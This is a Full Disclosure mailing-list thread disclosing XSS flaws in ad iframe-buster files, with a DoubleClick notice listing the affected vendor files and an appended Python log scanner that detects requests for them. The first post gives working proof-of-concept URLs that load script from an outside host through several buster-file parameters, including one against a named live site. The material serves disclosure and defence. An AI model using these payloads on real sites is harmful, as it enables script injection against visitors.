Full Disclosure mailing list archives
Re: Google supported XSS kit aka AdExchange iframe buster kit
From: Zmx <larouanne () gmail com>
Date: Thu, 21 Dec 2017 09:27:08 +0100
Next step, email from DoubleClick <doubleclick-noreply () google com>

Some more files to clean/check:

----
Dear Customer,

We’ve identified certain vendor files that may contain XSS vulnerabilities which could pose a security risk. Please check if you are hosting these files and remove them with the help of your webmaster.

These are the currently identified third-party vendor files:

1. adform/IFrameManager.html
2. admotion/afa-iframe.htm
3. bonzai/bonzaiBuster.html
4. exponential/buster.html
5. eyeblaster/addineyeV2.html
6. eyewonder/interim.html
7. flashtalking/ftlocal.html
8. ipinyou/py_buster.html
9. jivox/jivoxibuster.html
10. mediaplex/mojofb_v9.html
11. mixpo/framebust.html
12. predicta/predicta_bf.html
13. rockabox/rockabox_buster.html
14. liquidus/iframeX.htm
15. controbox/iframebuster.html
16. spongecell/spongecell-spongecellbuster.html
17. unicast/unicastIFD.html
18. adrime/adrime_burst.2.0.0.htm
19. revjet/revjet_buster.html
20. kpsule/iframebuster.html

We have disabled these vendors where possible for all DoubleClick for Publishers and DoubleClick Ad Exchange customers. However, any of the mentioned files hosted on your site may still pose a risk and should be taken down. We will notify you as we learn more.

For more information please refer to this Help Center article.

Regards,
The DoubleClick for Publishers and DoubleClick Ad Exchange Teams
---------

Fun fact? You can probably use DoubleClick to help you find websites where you can "serve" XSS/expandable ads.

Tr4L

2017-12-19 17:09 GMT+01:00 Zmx <larouanne () gmail com>:
Some more details:

1) The Google article seems to link the problematic kit only in non-English locales (check the French version or the Spanish one)
2) In order for predicta to work, you should host your JavaScript on a specific path: /mrm-ad/commons.js

2017-12-19 15:24 GMT+01:00 Zmx <larouanne () gmail com>:

Hi list,

The DFP AdExchange service of Google (the service that provides ads) is distributing an "Iframe Buster Kit" in order to allow iframe ads to expand outside of the iframe.
This needs some bypass of the restrictions applied to iframes, so Google provides a kit to install on your website:
- Help Document: https://support.google.com/dfp_premium/answer/1074250
- Kit: https://storage.googleapis.com/support-kms-prod/DB3CE51C3A5F783ED8198CDA753995FEB913

The kit contains several HTML and JS files to be hosted on your domains.
Some of those files (still provided by Google, remember) contain very visible XSS code:
One of them is "predicta", which simply allows you to pass the domain from which to load the JavaScript.

Quick proof of concept:
- https://www.jobisjob.ch/predicta/predicta_bf.html?dm=bgtian.life

As expandable ads allow websites to gain more ad revenue, those kits are present on a lot of websites.

Other "iframe buster kits" exist that are not provided by Google, and some of them are also vulnerable. From my list I have:
- /admotion/afa-iframe.htm?iq=https://bgtian.life/xss.js
- /ipinyou/py_buster.html?pybust=https://bgtian.life/xss.js
- /rockabox/rockabox_buster.html?rbbust=https://bgtian.life/xss.js (looks like different versions exist, however)
- /undertone/iframe-buster.html?ajurl=https://bgtian.life/xss.js

Some sources:
- Code of predicta_bf.html provided by Google in the kit: https://pastebin.com/BggXDHNA
- Code of https://bgtian.life/xss.js : https://pastebin.com/8GZTaJ4b
- Code of rockabox: https://pastebin.com/xqhs3zyz

Tr4L
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
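
One way to look for use of these files in your own web server logs, as an added example that is not part of the original thread: it flags requests for the file names listed in the DoubleClick notice and in the first post, and separates plain requests from those whose parameter names a host other than your own. The log lines, host names (`www.example.org`, `cdn.example.net`) and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# File names from the DoubleClick notice plus undertone from the first post.
BUSTER_FILES = set("""
adform/IFrameManager.html admotion/afa-iframe.htm bonzai/bonzaiBuster.html
exponential/buster.html eyeblaster/addineyeV2.html eyewonder/interim.html
flashtalking/ftlocal.html ipinyou/py_buster.html jivox/jivoxibuster.html
mediaplex/mojofb_v9.html mixpo/framebust.html predicta/predicta_bf.html
rockabox/rockabox_buster.html liquidus/iframeX.htm controbox/iframebuster.html
spongecell/spongecell-spongecellbuster.html unicast/unicastIFD.html
adrime/adrime_burst.2.0.0.htm revjet/revjet_buster.html kpsule/iframebuster.html
undertone/iframe-buster.html
""".lower().split())

REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r"(?:https?:)?//", re.I)
# Bare host name such as "cdn.example.net" (the predicta "dm" style of value).
BARE_HOST = re.compile(r"[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}(?:[:/]|$)", re.I)

def classify(line, own_hosts=("www.example.org",)):
    """None = unrelated, 'probe' = buster file requested,
    'external-script' = a parameter names a host that is not ours."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    path = url.path.lower().lstrip("/")
    if not any(path == f or path.endswith("/" + f) for f in BUSTER_FILES):
        return None
    for _, value in parse_qsl(url.query, keep_blank_values=True):
        if SCHEME.match(value) or BARE_HOST.match(value):
            try:
                host = urlsplit(value if SCHEME.match(value) else "//" + value).hostname
            except ValueError:
                return "external-script"  # unparsable URL: treat as suspicious
            if host and host.lower() not in own_hosts:
                return "external-script"
    return "probe"

SAMPLE_LOG = [  # constructed lines in combined log format
    '203.0.113.7 - - [21/Dec/2017:09:30:01 +0100] "GET /predicta/predicta_bf.html?dm=cdn.example.net HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [21/Dec/2017:09:30:05 +0100] "GET /ads/rockabox/rockabox_buster.html?rbbust=https%3A%2F%2Fcdn.example.net%2Fa.js HTTP/1.1" 200 498 "-" "-"',
    '198.51.100.4 - - [21/Dec/2017:09:31:10 +0100] "GET /mixpo/framebust.html HTTP/1.1" 404 153 "-" "-"',
    '198.51.100.4 - - [21/Dec/2017:09:31:12 +0100] "GET /index.html?ref=cdn.example.net HTTP/1.1" 200 9000 "-" "-"',
]

def scan(lines, own_hosts=("www.example.org",)):
    """Return (verdict, line) for every log line that touches a buster file."""
    return [(v, l) for l in lines if (v := classify(l, own_hosts))]
```

A `probe` answered with status 200 means the file is still hosted and should be taken down, as the notice asks.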